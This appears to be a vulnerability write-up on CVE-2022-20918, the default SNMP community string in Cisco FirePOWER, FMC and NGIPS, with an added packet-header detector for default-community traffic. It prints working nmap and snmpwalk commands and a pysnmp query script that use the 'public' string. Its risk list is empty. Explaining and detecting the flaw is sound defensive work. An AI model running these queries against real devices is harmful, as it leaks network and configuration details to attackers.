In late 2022, security researchers uncovered CVE-2022-20918, a serious vulnerability affecting multiple Cisco security products, specifically the Cisco FirePOWER Software for Adaptive Security Appliance (ASA) FirePOWER module, Firepower Management Center (FMC) Software, and Next-Generation Intrusion Prevention System (NGIPS) Software. This bug allows unauthenticated remote attackers to retrieve sensitive configuration and network details from vulnerable systems—all thanks to leftover default SNMP credentials most admins might overlook.
In this post, we’ll break down what the vulnerability is, what products are at risk, how an attacker could exploit it, sample attack code, and how you should protect your infrastructure.
What Is CVE-2022-20918?
This bug is what security experts call a default credential vulnerability in the handling of SNMP (Simple Network Management Protocol) access controls. On affected Cisco devices, both SNMPv1 and SNMPv2 come out-of-the-box with a default SNMP community string (essentially a shared password) that can be used to perform read-only queries. Cisco’s products use these community strings for managing network hardware, and normally, admins are expected to change them.
If SNMP is enabled, but the community string isn’t changed from the default value, an unauthenticated attacker on the network can send a simple SNMP "GET" request and pull network info—completely bypassing the expected access restrictions.
Affected products:
- Cisco FirePOWER Software for Adaptive Security Appliance (ASA) FirePOWER module
- Cisco Firepower Management Center (FMC) Software
- Cisco Next-Generation Intrusion Prevention System (NGIPS) Software
Important: If SNMP is disabled, or the community string is changed from the default, your system is safe from this attack.
References
- Cisco Advisory for CVE-2022-20918
- NIST Database Entry for CVE-2022-20918
Exploitation: How Attackers Pull Sensitive Info
The exploit is dead simple: an attacker only needs to know that SNMP is running on the target, then sends SNMP requests using the default community string (such as "public"). Here's how a basic attack looks in practice:
First, the attacker scans for open SNMP ports (default UDP port 161)
nmap -sU -p 161 <target_ip>
If port 161 is open, the attacker uses SNMP tools (like snmpwalk) to pull information
snmpwalk -v2c -c public <target_ip>
If the device is vulnerable, you’ll see pages of info about interfaces, routing tables, configs, and more.
Python Example: Exploiting SNMP with Default Credentials
Here’s a minimal Python script using the pysnmp library to perform a GET request for the system description:
# Synchronous high-level API of pysnmp 4.x
from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                          ContextData, ObjectType, ObjectIdentity, getCmd)

target_ip = "192.0.2.10"  # Placeholder (documentation range); replace with the target device IP
community = "public"      # Default community string

iterator = getCmd(
    SnmpEngine(),
    CommunityData(community, mpModel=1),   # mpModel=1 selects SNMP v2c
    UdpTransportTarget((target_ip, 161)),  # SNMP agent listens on UDP/161
    ContextData(),
    ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0)),  # sysDescr.0
)

errorIndication, errorStatus, errorIndex, varBinds = next(iterator)

if errorIndication:
    # Transport-level failure (for example a timeout, or SNMP disabled / filtered)
    print(errorIndication)
elif errorStatus:
    # The agent answered but reported an SNMP error; name the offending varbind if given
    print('%s at %s' % (errorStatus.prettyPrint(),
                        errorIndex and varBinds[int(errorIndex) - 1][0] or '?'))
else:
    for varBind in varBinds:
        print(' = '.join([x.prettyPrint() for x in varBind]))
Result: If the target is vulnerable, this script will return the system description string for the device, potentially leaking info about the software version and setup to the attacker.
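The script above shows the attacker's side. The following is an added example, not code from the original post or from Cisco, that turns the same material (the default community string explained earlier and the snmpwalk/pysnmp request just shown) toward detection: a standard-library-only parser that pulls the version, community string and PDU type out of raw UDP/161 payloads and flags the ones that use a default string, run over constructed sample datagrams. The small BER encoder exists only to build those samples; the addresses, the DEFAULT_COMMUNITIES set and every function name are this example's own assumptions.

```python
# Added example (not from the original post or Cisco): flag SNMP v1/v2c datagrams that use a default community string.
from dataclasses import dataclass
from typing import List, Optional, Tuple

DEFAULT_COMMUNITIES = {"public", "private"}  # assumed default list; extend with your vendor's documented defaults
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "Response", 0xA3: "SetRequest", 0xA5: "GetBulkRequest"}
VERSION_NAMES = {0: "v1", 1: "v2c", 3: "v3"}

def _tlv(tag: int, value: bytes) -> bytes:
    """BER tag + short-form length + value (enough for the small sample packets built here)."""
    return bytes([tag, len(value)]) + value

def _encode_int(v: int) -> bytes:
    """BER INTEGER for a non-negative value; the extra byte keeps the sign bit clear."""
    return _tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))

def _encode_oid(oid: str) -> bytes:
    """BER OBJECT IDENTIFIER: first two arcs packed into one byte, the rest base-128."""
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))

def build_get_request(community: str, oid: str, request_id: int = 1, version: int = 1) -> bytes:
    """Encode the GetRequest that snmpwalk/pysnmp send for one OID (version 1 = v2c, 0 = v1)."""
    varbind = _tlv(0x30, _encode_oid(oid) + b"\x05\x00")  # OID name + NULL placeholder value
    pdu = _tlv(0xA0, _encode_int(request_id) + _encode_int(0) + _encode_int(0) + _tlv(0x30, varbind))
    return _tlv(0x30, _encode_int(version) + _tlv(0x04, community.encode("latin-1")) + pdu)

def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Decode one TLV at buf[pos] -> (tag, value, next position); rejects truncated input."""
    if pos + 2 > len(buf):
        raise ValueError("truncated: missing tag/length")
    tag, first, pos = buf[pos], buf[pos + 1], pos + 2
    if first & 0x80:  # long-form length: the next (first & 0x7F) bytes hold the length
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated long-form length")
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    else:
        length = first
    if pos + length > len(buf):
        raise ValueError("truncated: value runs past end of packet")
    return tag, buf[pos:pos + length], pos + length

@dataclass
class SnmpHeader:
    version: int              # 0 = v1, 1 = v2c, 3 = v3
    community: Optional[str]  # None for SNMPv3, which has no community field
    pdu_tag: Optional[int]

def parse_snmp_header(packet: bytes) -> SnmpHeader:
    """Pull version, community string and PDU type out of a raw UDP/161 payload."""
    tag, body, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message: outer SEQUENCE missing")
    tag, ver, pos = _read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("version field is not an INTEGER")
    version = int.from_bytes(ver, "big", signed=True)
    if version == 3:
        return SnmpHeader(3, None, None)  # v3 authenticates USM users, not a community string
    tag, comm, pos = _read_tlv(body, pos)
    if tag != 0x04:
        raise ValueError("community field is not an OCTET STRING")
    pdu_tag, _, _ = _read_tlv(body, pos)
    return SnmpHeader(version, comm.decode("latin-1"), pdu_tag)

def scan_capture(records: List[Tuple[str, str, bytes]]) -> List[str]:
    """One alert per (src, dst, payload) record that is malformed or uses a default community."""
    alerts = []
    for src, dst, payload in records:
        try:
            hdr = parse_snmp_header(payload)
        except ValueError as exc:
            alerts.append(f"MALFORMED {src} -> {dst}: {exc}")
            continue
        if hdr.community in DEFAULT_COMMUNITIES:
            alerts.append(f"DEFAULT-COMMUNITY {src} -> {dst}: SNMP{VERSION_NAMES.get(hdr.version, '?')} "
                          f"{PDU_NAMES.get(hdr.pdu_tag, 'PDU')} community={hdr.community!r}")
    return alerts

# Constructed sample traffic on RFC 5737 documentation addresses (not a real capture).
SYS_DESCR = "1.3.6.1.2.1.1.1.0"
SAMPLE_RECORDS = [
    ("198.51.100.7", "192.0.2.10", build_get_request("public", SYS_DESCR)),             # default string
    ("198.51.100.7", "192.0.2.11", build_get_request("n0t-a-default", SYS_DESCR)),      # rotated string
    ("198.51.100.7", "192.0.2.12", build_get_request("private", SYS_DESCR, version=0)), # SNMPv1, default
    ("198.51.100.7", "192.0.2.13", build_get_request("public", SYS_DESCR)[:20]),        # truncated datagram
]
if __name__ == "__main__":
    print("\n".join(scan_capture(SAMPLE_RECORDS)))
```

The detector deliberately reads only the message header, which is all a network sensor needs: a hit on "public" or "private" from a host that is not your monitoring system is either an unchanged default or someone probing for one, and a truncated or non-BER payload on UDP/161 is worth its own alert rather than a silent skip. SNMPv3 packets carry no community string, so they pass through untouched.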
What’s the Real-World Risk?
While attackers cannot write or make changes with this bug, having access to SNMP information can lead to:
Upgrade Cisco Software
- Update to a fixed version as listed on Cisco’s advisory.
Key Takeaways
- CVE-2022-20918 makes it easy for attackers to read Cisco FirePOWER device info over SNMP if default creds are not changed.
- The attack doesn't allow changes, but can leak data useful for further exploitation.
- Fix it: Change community strings, disable SNMP if possible, and always keep your devices updated.
Learn More
- Cisco Advisory
- NIST CVE-2022-20918
- Understanding SNMP Security Risks
Timeline
Published on: 11/15/2022 21:15:00 UTC
Last modified on: 11/22/2022 00:48:00 UTC